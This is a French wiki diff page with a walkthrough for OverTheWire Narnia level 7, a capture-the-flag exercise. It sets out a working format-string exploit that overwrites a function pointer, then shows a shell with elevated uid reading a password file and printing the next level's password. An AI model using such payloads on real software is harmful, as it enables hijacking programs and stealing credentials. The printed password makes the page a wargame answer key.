Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.
overthewire_narnia:level7 [2013/03/03 15:28] thelizardking créée |
overthewire_narnia:level7 [2017/04/09 15:33] (Version actuelle) |
||
---|---|---|---|
Ligne 58: | Ligne 58: | ||
return 0; | return 0; | ||
} | } | ||
+ | </code> | ||
+ | |||
+ | Une simple format string, il faut écrire l'adresse de ''hackedfunction'' dans la variable ''ptrf''. La tâche est grandement facilité étant donné qu'on nous donne l'adresse de la variable. | ||
+ | |||
+ | <code> | ||
+ | |||
+ | $ ./narnia7 $(python -c 'print "l\xd6\xff\xffm\xd6\xff\xffn\xd6\xff\xffo\xd6\xff\xff%145c%6$hhn%229c%7$hhn%126c%8$hhn%4c%9$hhn"') | ||
+ | goodfunction() = 0x804867b | ||
+ | hackedfunction() = 0x80486a1 | ||
+ | |||
+ | before : ptrf() = 0x804867b (0xffffd66c) | ||
+ | I guess you want to come to the hackedfunction... | ||
+ | Way to go!!!!$ id | ||
+ | uid=14007(narnia7) gid=14007(narnia7) euid=14008(narnia8) groups=14008(narnia8),14007(narnia7) | ||
+ | $ cat /etc/narnia_pass/narnia8 | ||
+ | mohthuphog | ||
</code> | </code> |